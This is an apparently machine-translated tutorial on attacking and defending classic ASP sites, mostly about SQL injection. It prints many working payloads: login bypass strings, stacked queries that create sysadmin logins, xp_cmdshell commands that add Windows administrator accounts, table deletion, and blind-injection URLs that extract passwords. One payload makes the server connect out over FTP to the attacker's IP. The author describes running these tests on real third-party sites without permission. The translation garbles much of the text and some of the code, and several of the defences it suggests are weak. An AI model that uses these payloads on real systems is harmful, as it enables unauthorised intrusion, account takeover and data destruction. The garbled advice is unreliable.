SQL injection attacks and Prevention

I have never studied ASP or PHP programming in a system, or access, SQL Server, MySQL, or other databases in a system. So I am not a programmer, although I often do something similar to a programmer.
Because we need to build our own site, three revisions have been made, and thousands of lines of programs have been written. In addition, some problems have also been found in the testing of forums, message boards, and article publishing systems, we will discuss with you now.
At the time of writing this article, in addition to setting up an ASP + ACCESS and ASP + SQL Server test environment on the local machine, I am sorry for some tests on the websites of x× security website, x× city talent network, and x× network company! I chose am ~ The test started at is limited to search operations, so it is certain that there is almost no impact on your site. I will exchange a little more traffic for your security report within one hour, I don't think it's too bad, huh, huh!
1. Bak file leakage ASP source code
Many editing tools, such as editplus and ultraedit, automatically back up a. Bak file when saving files by default. For example, create or edit config. ASP file, the editor will automatically generate a config. ASP. if the Bak file is not deleted, attackers can use http: // www. ***. COM/config. ASP. bak to download the ASP source program.
As you can imagine, if your source program is downloaded, the risk of being attacked is undoubtedly high. For configuration files, user name, password, database name/location ......
Solution: either disable the automatic backup function of the editor or delete all. BAK files during upload.
2. Authentication Bypass
In general, many pages of a website can be accessed only after authentication is passed. On these pages, the user identity must be verified again, but many programmers often ignore this. If attackers know the path and file name of these pages, they can bypass authentication and directly access the page. For example, you must log in through the login. ASP page and go to the manage. ASP page only after authentication. Attackers can directly access the management interface through http: // www. ***. com/manage. asp.
Solution: confirm the identity at the beginning of these pages. For example, after the authentication is passed, pass a session ("login") = "OK" and add it at the beginning of manage. asp
The following is the program code:

If SESSION ("login") <> "OK" then
Response. Redirect "login. asp"
End if

The above two points are all about the basic issues of programming. The focus of this article will be discussed below: SQL injection attacks and prevention.
3. ASP program Database Password Verification Vulnerability
First, for the request object, we know that if you use the get method to pass data in the form, you should use the querystring set to retrieve the form data. When you use the POST method to pass data, you should use the form set to retrieve form data. For convenience, more programmers simply omit the Set Name and use request ("data") to retrieve data. It seems simple, in fact inefficient, and error-prone. By default, ASP searches for a set in the order of querystring, form, cookie, and serverariable. When the first matching variable is found, it is considered to be the member you want to access. Therefore, we recommend that you do not use this method. After you finish the problem, let's proceed to the subject.
First, let's look at the login. asp file.
The following is the program code:

......
<Form action = "verify. asp" method = "Post" name = "login">
Username <input type = text name = Name value = "" maxlength = "20">
Password <input type = password name = PWD value = "" maxlength = "20">
<Input type = submit name = BT value = "OK">
<Input type = reset name = BT value = "reset">
</Form>
......

Let's take a look at the verify. asp file.
The following is the program code:

......
Dim RS, SQL
Dim name, PWD
Name = request. Form ("name ")
Pwd = request. Form ("PWD ")

If name = "" Or Pwd = "" then
Response. Redirect "login. asp"
End if
......
'About Identity Authentication
SQL = "select * from user where name = '" & name & "' and Pwd = '" & PWD &"'"
......

Do not think that no one will write like this. I have seen many people. If you believe me, see what attackers can do:
(1) Enter "admin" or 1 = "1" in the user name and "11" in the password area ]. Note: The content is only in. See what SQL will become:
The following is the program code:

SQL = select * from user where name = 'admin' or 1 = '1' and Pwd = '11'

We know that or is a logical operator. When multiple conditions are judged, as long as one condition is true, the equation returns true, and the and following conditions are no longer judged, that is to say, we have bypassed password verification and can log on to the system as long as we know the user name.
(2) You can also enter "admin" -- "in the user name and" 11 "in the password area ]. Let's look at SQL:
The following is the program code:

SQL = select * from user where name = 'admin' -- 'and pasword = '11'

Similarly, the password verification is commented out through the connector, which is invalid for the access database.
(3) If you can comment out the subsequent verification via a connector, it will be more interesting to see what we can do:
A. Enter "admin"; Exec master. DBO. sp_addlogin cool; -- "at the user name to add an SQL user.
B. Enter "admin"; Exec master. DBO. sp_password null, 123456, cool; -- "at the user name location, and set the cool password to 123456.
C. Enter [admin '; Exec master. DBO. SP_ADDSRVROLEMEMBER cool, SysAdmin; --] in the user name location to grant the system administrator permission to cool.
D. Enter "admin"; Exec master. DBO. xp_mongoshell "Net user cool 123456/workstations at the user name location :*
/Times: All/passwordchg: yes/passwordreq: yes/active: yes/add'; --]: Add a cool account with a password of 123456 to the system and set related properties, for the net user command, refer to here.
E. Enter [admin '; Exec master. DBO. xp_mongoshell 'net localgroup administrators cool/add'; --] at the user name location to add the cool user to the Administrator group.
I think it's terrible now. Of course, I haven't finished it yet. To achieve this, you must use the SA or system administrator permission on the site to connect to the database. You don't need to think about the common virtual space, unless the Administrator is sb. However, it is hard to say that websites are placed on their own servers. I have seen n websites.
If it is not SA, then nothing can be done, of course not! We just cannot get too high permissions to control the SQL database and system, but we still have full management permissions for this database. Let's see what we can do:
A. Enter [admin '; delete user; --]. Once the table name is user, all records in the User table will be deleted. It's tough! You must never do this!
B. Enter [admin '; insert into user (name, PWD) values ('cool', '000000'); --] to add a user to the user table, the premise is that the table name and field name must be correct.
C. Enter [admin '; Update News set Pwd = '000000' where name = 'admin'; --] to change the admin password, the premise is that both the table name and field name must be correct.
For more attack content, refer to SQL syntax.
It seems that SA is still depressing. Of course, we also have some simple methods to determine whether the website uses SA to connect to the database.
A. Execute nc-l-P 21 in cmd to listen to port 21 of the Local Machine. Of course, you can also use fire wall or something.
B. Enter [admin '; Exec master. DBO. xp_cmdshell 'ftp *. *. *. * ']. * indicates your IP address. If a connection is found, you can determine that the SA is used and obtain the IP address of the website database, because some websites use web and SQL on different servers. If there is no connection, the website uses non-SA accounts.
Some friends may have seen that if the website uses SA, we can initiate a connection from the internal server through the page, construct an FTP script, or use TFTP to upload files, even if there is a fire wall.
Some may say that the maximum length in the form is 20, and you cannot enter that much! It's okay, but it's hard for us.
Method 1:
A. Open the website page http: // www. ***. com/login. asp, view the source file, and submit the form part.
The following is the program code:

<Form action = "verify. asp" method = "Post" name = "login">
Username <input type = text name = Name value = "" maxlength = "20">
Password <input type = password name = PWD value = "" maxlength = "20">
<Input type = submit name = BT value = "OK">
<Input type = reset name = BT value = "reset">
</Form>

Stored in login.htm
B. Modify the action to http: // www. ***. com/verify. asp, that is:
The following is the program code:

<Form action = "http: // www. ***. com/verify. asp" method = "Post" name = "login">
Username <input type = text name = Name value = "" maxlength = "20">
Password <input type = password name = PWD value = "" maxlength = "20">
<Input type = submit name = BT value = "OK">
<Input type = reset name = BT value = "reset">
</Form>

Note: If the action on some websites is empty, you need to look for it and submit it to it. I have encountered such a situation and can generally find it.
C. Modify maxlength, increase it, and then increase it. Otherwise, delete it!
D. Submit the variable from the local device.
Method 2:
Cool. Reg
9x User:
The following is the program code:

Regedit4

[HKEY_CURRENT_USER/software/Microsoft/Internet Explorer/menuext/increase for me>
@ = "C: // cool.htm"
"Contexts" = DWORD: 00000004

2 k users:
The following is the program code:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER/software/Microsoft/Internet Explorer/menuext/increase for me>
@ = "C: // cool.htm"
"Contexts" = DWORD: 00000004

Cool.htm
The following is the program code:

<Script language = vbs>
Set srcevent = External. menuarguments. Event
Set doc=external.menuarguments.doc ument
Set ele = Doc. elementfrompoint (srcevent. clientx, srcevent. clienty)
If ELE. type = "text" or ELE. type = "password" then
Ele. max length = 100
Ele. size = 100
End if
</SCRIPT>

A. Copy the content of cool. Reg, save, execute, and confirm.
Bw.beibei cool.htm content, saved to the specified location, here is C :/
C. Open the webpage http: // www. ***. com. Right-click the input box and you will see "add to Me". Click it.
Of course, you can modify cool.regto change the cool.htmfile name or cool.htm to change the size and maxlength.
Well, let's talk about so many horrible things to see how to prevent them.
(1) filter and submit data. We can use
The following is the program code:

......
Dim name, PWD
Name = request. Form ("name ")
Name = Replace (name, "'", "'") 'replace halfwidth with fullwidth'
Name = Replace (exp1, "-", "") 'replace-Null
Name = Replace (exp1, ";", "") 'replacement; null
......

Or
The following is the program code:

......
Dim name, PWD
Name = request. Form ("name ")
If instr (name, "'") or instr (name, "-") or instr (name, ";") then
Response. Write ("<script language =" "JavaScript" ">
Alert ("" error! ""); History. Go (-1); </SCRIPT> ")
Response. End
End if
......

The specific filtering conditions or replacement must be used in combination with the actual conditions.
(2) The Verify. asp File validation logic is incorrect and should be changed:
The following is the program code:

......
Set rs = server. Createobject ("ADODB. recordset ")
SQL = "select * from user where name = '" & name &"'"
Rs. Open SQL, conn_data, 1, 1
'Authentication Process
If not Rs. EOF then
If Pwd = RS ("PWD") then
Session ("login") = "OK"
Response. Redirect "/default. asp"
Else
Response. Redirect "login. asp"
End if
Else
Response. Redirect "login. asp"
End if
......

That is to say, the user name is used as the condition to retrieve the database, and the password of the retrieved record is compared with the password entered by the client.
(3) There are many related encryption processes on the Internet for user password encryption. If this is assumed to be encrypt (), verify. asp should be
The following is the program code:

......
Set rs = server. Createobject ("ADODB. recordset ")
SQL = "select * from user where name = '" & name &"'"
Rs. Open SQL, conn_data, 1, 1
'Authentication Process
If not Rs. EOF then
If encrypt (PWD) = RS ("PWD") then', encrypt the entered password.
Session ("login") = "OK"
Response. Redirect "/default. asp"
Else
Response. Redirect "login. asp"
End if
Else
Response. Redirect "login. asp"
End if
......

(4) query, insert, update, and delete operations with different user accounts. The operations that can be performed by different accounts are isolated, which prevents the places where the SELECT command was originally used to execute the insert, update, or delete command. Do not be in trouble if it is a large official site!
(5) set a specific stored procedure through the database and only allow execution of a specific stored procedure. All user input must comply with the security context of the called stored procedure, in this way, it is difficult to launch injection attacks again.
(6) restrict the input length of a form or query string. If the user's login name is only 20 characters at most, do not recognize the 20 or more characters entered in the form, which will greatly increase the difficulty for attackers to insert harmful code in SQL commands. Of course, we can bypass this restriction through local commit, but there is no way to control it. Let's see:
A. When retrieving data, only data within the valid length is obtained.
The following is the program code:

......
Dim name, PWD
Name = left (request. Form ("name"), 20)
......

B. Confirm the submission location on the server
Login. asp
The following is the program code:

......
<Form action = "verify. asp" method = "Post" name = "login">
<Input type = "hidden" name = "Referer"
Value = "<% = request. servervariables (" http_referer ") %>">
<Input type = "hidden" name = "ser_name"
Value = "<% = request. servervariables (" SERVER_NAME %> ">
Username <input type = text name = Name value = "" maxlength = "20">
Password <input type = password name = PWD value = "" maxlength = "20">
<Input type = submit name = BT value = "OK">
<Input type = reset name = BT value = "reset">
</Form>
......

Two Parameters Referer and ser_name are passed here.
Verify. asp
The following is the program code:

......
Dim Referer, ser_name
'Take the two parameters
Referer = CSTR (request. servervariables ("http_referer "))
Ser_name = CSTR (request. servervariables ("SERVER_NAME "))
'Determine the browser location
If mid (Referer, 8, Len (ser_name) <> ser_name then
Response. Redirect "login. asp"
End if
......

In this way, if you do not submit data on this website, you will not be able to log on smoothly.
(7) Check the number of records returned by the extracted data query. If the program only needs to return one record, but the actual returned record is more than one row, it is treated as an error.
4. webpage transmission parameters are not filtered
Many websites have this problem, such as http: // www. ***. com/show. asp? Id = 50. The whole website is in a very dangerous situation when no ID is filtered or valid.
We can test whether this problem exists through a simple method:
Http: // www. ***. com/show. asp? Id = 50 and 1 = 1
If the page is displayed correctly, it can be determined that this problem exists.
To see what attackers can write:
(1) http: // www. ***. com/show. asp?
Id = 50; Exec master. DBO. sp_addlogin cool ;--
(2) http: // www. ***. com/show. asp?
Id = 50; Exec master. DBO. sp_password null,
123456, cool ;--
(3) http: // www. ***. com/show. asp?
Id = 50; Exec master. DBO. SP_ADDSRVROLEMEMBER
Cool, SysAdmin ;--
(4) http: // www. ***. com/show. asp?
Id = 50; Exec master. DBO. xp_mongoshell 'net
User cool 123456/add ';--
(5) http: // www. ***. com/show. asp?
Id = 50; Exec master. DBO. xp_mongoshell 'net
Localgroup administrators cool/add ';--
As long as it can be submitted in a form, you can submit it here.
(6) Name of the table to be guessed
: Http: // www. ***. com/show. asp? Id = 50 and
0 <> (select count (*) from tablename). Here, tablename is the name of the table you guessed. If the page is displayed normally, the table name you guessed is correct.
(7) Guess the field name:
Http: // www. ***. com/show. asp? Id = 50 and
0 <> (select count (fieldname) from tablename). Here, fieldname is the name of a field in the table. If the page shows normal, it can be determined that the field name is correct.
(8) after obtaining tablename and fieldname, you can proceed further.
For example, you can log on to the system, tablename is user, fieldname is ID, name and PWD, and see what you can do:
A. http: // www. ***. com/show. asp? Id = 50 and 0 <>
(Select count (x) from user where ID> 1000)
Roughly determine the number of users
B. http: // www. ***. com/show. asp? Id = 50 and 1 =
(Select count (*) from user where id = 1 and Len (name) = 10)
Judge whether the length of the user name with ID 1 is 10
C. http: // www. ***. com/show. asp? Id = 50 and 1 =
(Select count (*) from user where id = 1 and mid (name, N, 1) = 'A ')
Determine whether the nth digit of the user name with ID 1 is
D. http: // www. ***. com/show. asp? Id = 50 and 1 =
(Select count (*) from user where id = 1 and Len (PWD) = 10)
Determine whether the password length of a user with ID 1 is 10
E. http: // www. ***. com/show. asp? Id = 50 and 1 =
(Select count (*) from user where id = 1 and mid (PWD, N, 1) = 'A ')
Determine whether the nth digit of the user's password with ID 1 is a. If your password is not encrypted, hey!
Of course, mid (PWD, N, 1) can also be written as right (left (PWD, n), 1), personal habits!
But isn't it too tired to try it like this? Use Perl to write a little stuff and use a dictionary? Oh, just follow you!
In addition, there is a small trick that allows you to quickly crack the user name and password. I use this method, in 10 minutes, the user name of the table name, the name of the column to be guessed, the username of a 10-bit long (five Chinese Characters in total), and the 12-bit (one-bit Chinese character) password to be cracked were completed, I got the username and password of the backend administrator of the XX security website, but 8 of them were guessed by social engineering. It's just a bit depressing that I didn't find the login interface on the website background ......
A. http: // www. ***. com/show. asp? Id = 50 and 1 =
(Select count (*) from user where id = 1 and Len (name) = 10)
Determine the username length first
B. http: // www. ***. com/show. asp? Id = 50 and 1 =
(Select count (*) from user where id = 1 and Len (PWD) = 10)
Confirm the password length
C. http: // www. ***. com/show. asp? Id = 50 and 1 =
(Select count (*) from user where id = 1
SRC (mid (name, 1, 1) <0)
Determine whether the first user name is Chinese. If the user name is Chinese, it is generally negative.
If not, it generally ranges from 27 ~ Between 126, available
Http: // www. ***. com/show. asp? Id = 50 and 1 =
(Select count (*) from user where id = 1
SRC (mid (name, N, 1)> 60)
Http: // www. ***. com/show. asp? Id = 50 and 1 =
(Select count (*) from user where id = 1
SRC (mid (name, N, 1) <100)
To determine the range, and finally obtain the ASC code value. By comparing (commonly used ASCII code comparison table), we can obtain the nth content.
If it is Chinese, it should be less than-32,768. You can use
Http: // www. ***. com/show. asp? Id = 50 and 1 =
(Select count (*) from user where id = 1
SRC (mid (name, N, 1)>-30000)
Http: // www. ***. com/show. asp? Id = 50 and 1 =
(Select count (*) from user where id = 1
SRC (mid (name, N, 1) <-10000)
To determine the range, and finally obtain the ASC code value. The Nth bit of content is obtained through conversion. Many editing tools have this function. You can also use CHR () function output for conversion.
D. Similarly, you can quickly obtain the password content.
Are you aware of the problem that the Set Name is omitted in the request object just mentioned ?! :)
Solution: this type of problem mainly involves filtering transmitted parameters and verifying data validity.
Limited by the individual level, the above content is not necessarily completely correct, and there are still many areas not mentioned, I hope to communicate with you more. Asp? Id = 980 width = 1 Height = 1>